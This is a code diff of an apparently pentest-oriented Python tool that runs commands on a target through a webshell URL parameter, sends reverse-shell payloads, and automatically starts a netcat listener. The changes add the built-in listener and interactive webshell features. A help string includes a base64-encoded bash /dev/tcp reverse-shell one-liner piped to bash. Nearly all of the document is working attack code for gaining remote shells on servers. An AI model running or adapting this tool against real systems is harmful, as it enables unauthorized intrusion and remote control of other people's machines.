@@ -15,8 +15,8 @@ import pyperclip as pc
 import base64
 from IPy import IP
 import textwrap
-
-
+import readline
+from subprocess import Popen
 
 
 blue = "\033[34m"                                                                                                                                                                          
@@ -75,7 +75,7 @@ def aerr(text) :
 #=================================================================================================================================================	
 def banner(): 
 	colors = ["\033[31" , "\033[32" , "\033[33" , "\033[34" , "\033[35" , "\033[36" ,"\033[91" , "\033[92" , "\033[93" , "\033[94" , "\033[94" ,"\033[96"] #contains some color code
-	print(f"""{random.choice(colors)}m
+	os.system("""echo '
  ▄████▄    ██████  ██░ ██ ▓█████  ██▓     ██▓    
 ▒██▀ ▀█  ▒██    ▒ ▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒    
 ▒▓█    ▄ ░ ▓██▄   ▒██▀▀██░▒███   ▒██░    ▒██░    
@@ -86,7 +86,7 @@ def banner():
 ░        ░  ░  ░   ░  ░░ ░   ░     ░ ░     ░ ░   
 ░ ░            ░   ░  ░  ░   ░  ░    ░  ░    ░  ░
 ░                                                
-\033[0m""") # picks random colors from colors array and display the banner with that color and reset the collor using \033[0m
+ '| lolcat""") # picks random colors from colors array and display the banner with that color and reset the collor using \033[0m
 
 
 #=================================================================================================================================================	
@@ -137,16 +137,24 @@ def payload_base_test(target , payloadtype):
 #=================================================================================================================================================	
 # This function sends the payload 
 #=================================================================================================================================================	
-def send_payload(target , payload ):
-	ainfo("Sending payload")
+def send_payload(target , payload , port , lstnr=False):
 	try:
-		requests.get(target.replace("REV" , payload) , timeout=2) #here timeout is given as after sending the reverse shell the page stops responding. so this timeout will wait for the given time and exit after that time, here we added try execpt beacause this returns a error 'requests.exceptions.ReadTimeout' after exitting on timeout
-	except requests.exceptions.ReadTimeout: #if error is requests.exceptions.ReadTimeout, this will do nothing.
-		pass
-	ap("Payload sent successfully")
-	ainfo("Check Your listener")
-	ap("Good luck on Privilege Escalation :)")
-
+		if not lstnr:
+			ainfo("Starting listener")
+			Popen(["nc","-lvnp",port])
+			ainfo("Sending payload")
+			requests.get(target.replace("REV" , payload)) 
+		else:
+			ainfo("Sending payload")
+			try:
+				requests.get(target.replace("REV" , payload) , timeout=2)
+			except requests.exceptions.ReadTimeout:
+				ap("Payload sent successfully")
+				sys.exit() 
+	except KeyboardInterrupt:
+		print()
+		aerr("Exitting...")
+		sys.exit()
 #=================================================================================================================================================	
 # this functiion generates the payload
 #=================================================================================================================================================	
@@ -202,7 +210,7 @@ def info(type, target , ip="0.0.0.0", port="1337" , payloadtype="bash" , base64e
 	now = datetime.now()
 	dttime = now.strftime("%d-%m-%Y %H:%M:%S") # takes the time 
 	print("========================================================================================================")
-	print("By 0z09e  | Twitter => https://twiter.com/0z09e")
+	print("By 0z09e | Twitter => https://twitter.com/0z09e")
 	print("========================================================================================================")
 	if type == 'rev':
 		ainfo(f"Target\t\t{target}")
@@ -210,7 +218,6 @@ def info(type, target , ip="0.0.0.0", port="1337" , payloadtype="bash" , base64e
 		ainfo(f"Listening Port\t{str(port)}")
 		ainfo(f"Payload format\t{payloadtype}")
 		ainfo("Payload\t\t" + payloads_dict.get(payloadtype).replace('\t' , '').replace("127.0.0.1" , ip).replace("1337" , str(port))) # This replace the target ip and port with the actual Attacker ip and port
-		ainfo(f"Listener command\tsudo nc -lvnp {port}")
 	elif type == 'lstnr':
 		ainfo(f"Listening IP\t{ip}")
 		ainfo(f"Listening Port\t{str(port)}")
@@ -270,6 +277,7 @@ def webshell_help(cmd=None):
 
 
 
+
 #=================================================================================================================================================
 #	This function sends every command to the webshell
 #=================================================================================================================================================	
@@ -284,11 +292,13 @@ def webshell(target):
 		hostname = requests.get(f"{target.replace('WEB' , 'hostname')}").text.rstrip()
 		
 		print("\x1b[2J\x1b[H",end="") #This clears the screen
+		readline.parse_and_bind('tab: complete')
+		readline.parse_and_bind('set editing-mode vi')
 		while 1:
 			try:
-				inpt = input(prompt(pwd , hostname , whoami))
-				if webshell_help(inpt):
-					continue
+				inpt = input(prompt(pwd , hostname , whoami)) #creaye prompt and asks for command
+				if webshell_help(inpt): # check if command matches the help
+					continue 
 
 				cmd = requests.utils.quote(f"echo -n [OUTPUT_START] && cd {pwd}&&{inpt} 2>&1 &&echo [PROMPT_START]$(pwd)[+]$(hostname)[+]$(whoami)[PROMPT_END][OUTPUT_END]") # sending 2>&1 with the prompt in order to get the error message 
 				res = requests.get(f"{target.replace('WEB' , cmd)}") # Replacing the web parameter with the cmd
@@ -348,6 +358,7 @@ def listener(ifname , port , payload_type='bash' , startlistener=False , base64e
         b64_encoded_payload = b64_enc.decode('ascii')
         payload = f"echo {b64_encoded_payload}|base64 -d|bash"
     pc.copy(payload) #copy the payload into the clipboard
+    ap(f"Payload => {payload}")
     ap("Payload has been copied to your clipboard")
     if startlistener: #starts the listener
         ainfo("Starting netcat listener")
@@ -358,7 +369,7 @@ def listener(ifname , port , payload_type='bash' , startlistener=False , base64e
 
 def main():
 	if os.name == "nt":
-		aerr("This script is for linux kernerls, Thank you.")
+		aerr("This script is only for linux kernels, Thank you.")
 		sys.exit()
 	# This are for the Arguments
 	myparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter ,  epilog=textwrap.dedent('''\
@@ -373,25 +384,28 @@ def main():
 #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 	# reverse shell arguments
 	rev = subparsers.add_parser("rev" ,formatter_class=argparse.RawDescriptionHelpFormatter , description='''Description : It takes a working a webshell as an argument, executes the payload and returns a reverse shell on the listener.
-		''' , epilog='[N.B - This doesn\'t comes with a builtin listener as it\'s impossible to trigger the payload and start a listener at the same time.\n You have to start a listener before executing this program]')
-	rev.add_argument('-f', metavar='Format', type=str, required=False , default='bash' ,help='Reverse shell payload format. default : bash')
+		''' )
+	rev.add_argument('-f', metavar='Format', type=str, required=False , default='bash' ,help='Reverse shell payload format. [Default - bash]')
+	rev.add_argument('--nolstn' , action='store_true' , required=False , help="Don't start the listener" )
+	rev.add_argument('-p', metavar='Listening-Port' , required=False ,default=1337 ,type=int, help='Attacker\'s Port In which the reverse shell will be recived [Default - 1337]. Note : Port must be in-between 1 to 65535')
 	rev_required = rev.add_argument_group('required arguments')
-	rev_required.add_argument('-u', metavar='Target URL', required=True , default="test", help='Full URL of the target, Add \'REV\' as a command on the parametr. Example: http://127.0.0.1/webshell.php?cmd=REV')
-	rev_required.add_argument('-i', metavar='Listening-IP' , required=True , help='Attacker\'s IP address for reciving reverse shell')
-	rev_required.add_argument('-p', metavar='Listening-Port' , required=True , type=int, help='Attacker\'s Port In which the reverse shell will be recived. Note : Port must be in-between 1 to 65535')
+	rev_required.add_argument('-i', metavar='Listening-IP' , required=True , help='Attacker\'s IP or Interface name for reciving reverse shell')
+	rev_pos = rev.add_argument_group('positional arguments')
+	rev_pos.add_argument('target', metavar='Target', default="test", help='Full URL of the target, Add \'REV\' as a command on the parametr. Example: http://127.0.0.1/webshell.php?cmd=REV')
+
 
 #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 	# web shell arguments
 	web = subparsers.add_parser("web" , formatter_class=argparse.RawDescriptionHelpFormatter , description='Description : It takes a working reverse shell as an argument and executes command on that reverse shell in real time,\n\t      This also shows error message and persists the working directory')
-	web_required = web.add_argument_group('required arguments')
-	web_required.add_argument('-u',  metavar="Target url" , required=True , help="Target URL with 'WEB' as a command. Example : http://127.0.0.1/webshell.php?cmd=WEB")
+	web_required = web.add_argument_group('positional arguments')
+	web_required.add_argument('target',  metavar="Target" , help="Target URL with 'WEB' as a command. Example : http://127.0.0.1/webshell.php?cmd=WEB")
 
 
 #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 	# listener Argument
 	lstn = subparsers.add_parser("lstnr" , formatter_class=argparse.RawDescriptionHelpFormatter , description='Description : It generates and copies whatever payload from the payload list [You can list all the payloads using \'--payloads\']. it also starts a listener [Optional].')
-	lstn.add_argument("-p" , metavar="Port" , required=False , default=9001 , help="Reverse shell's port. Default : 9001")
-	lstn.add_argument("-f" , metavar="Format" , required=False , default="bash" , help="Reverse shell's format. Default : bash")
+	lstn.add_argument("-p" , metavar="Port" , required=False , default=1337 , help="Reverse shell's port. [Default : 1337]")
+	lstn.add_argument("-f" , metavar="Format" , required=False , default="bash" , help="Reverse shell's format. [Default : bash]")
 	lstn.add_argument("--lstn" , action='store_true' , required=False , help="Start the listener")
 	lstn.add_argument("--b64" , action='store_true' , required=False , help="Encode the payload in base64 format. Example payload : echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTAwMSAwPiYxCg== | base64 -d | bash")
 	lstn_required = lstn.add_argument_group("required arguments")
@@ -403,11 +417,18 @@ def main():
 
 	if args.command == "rev":
 			banner()
-			url = args.u
+			url = args.target
 			ip = args.i
 			port = args.p
 			fmt = args.f
-			if "REV" not in url:
+			nolstn = args.nolstn
+			try: 
+				if IP(ip): #validated ip
+					ip = ip
+			except ValueError: # takes ip from interface
+				ip = get_ip_address(ip)
+
+			if "REV" not in url: #check the rev word
 				aerr(f"\'REV\' not found on Target URL")
 				sys.exit()
 			if fmt not in list(payloads_dict.keys()):
@@ -420,11 +441,12 @@ def main():
 				sys.exit()
 			info( "rev" , url , ip , port , fmt , 'rev')
 			if avalability_check(url , "REV") and payload_base_test(url , fmt):
-				send_payload(url , payloads(fmt , ip , port))
+				send_payload(url , payloads(fmt , ip , port) , str(port) , lstnr=nolstn)
 
 	elif args.command == "web":
 		banner()
-		url = args.u
+		global target_url
+		url = args.target
 		if "WEB" not in url:
 			aerr(f"\'WEB\' not found on Target URL")
 			sys.exit()
@@ -446,3 +468,4 @@ def main():
 		banner()
 		myparser.print_help()
 
+#print(all_commands("http://127.0.0.1:8000/webshell.php?cmd=WEB"))
\ No newline at end of file
